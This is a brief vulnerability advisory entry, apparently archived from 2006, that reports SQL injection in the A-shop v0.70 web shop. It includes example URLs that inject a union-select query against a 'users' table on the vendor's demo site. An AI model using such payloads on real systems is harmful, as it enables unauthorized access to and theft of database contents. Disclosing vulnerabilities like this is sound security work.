A-shop v0.70 SQL INECTION

2006-06-06T00:00:00
ID SECURITYVULNS:DOC:12988
Type securityvulns
Reporter Securityvulns
Modified 2006-06-06T00:00:00

Description

Product : A-shop Version : v0.70 Vulnerability : SQL INJECTION

http://www.rammdev.com/ashop/demo/default.asp?mod=search&type=simple&q='SQLINJECTION'&cmdSearch=Search

Example ;

> > http://www.rammdev.com/ashop/demo/default.asp?mod=search&type=simple&q='unionselect%201,1,1,1%20from%20users'&cmdSearch=Search

<http://www.rammdev.com/ashop/demo/default.asp?mod=search&type=simple&q='union>

Thanks Broth3rhood [ ÇağLaR ] mail : broth3rhood@gmail.com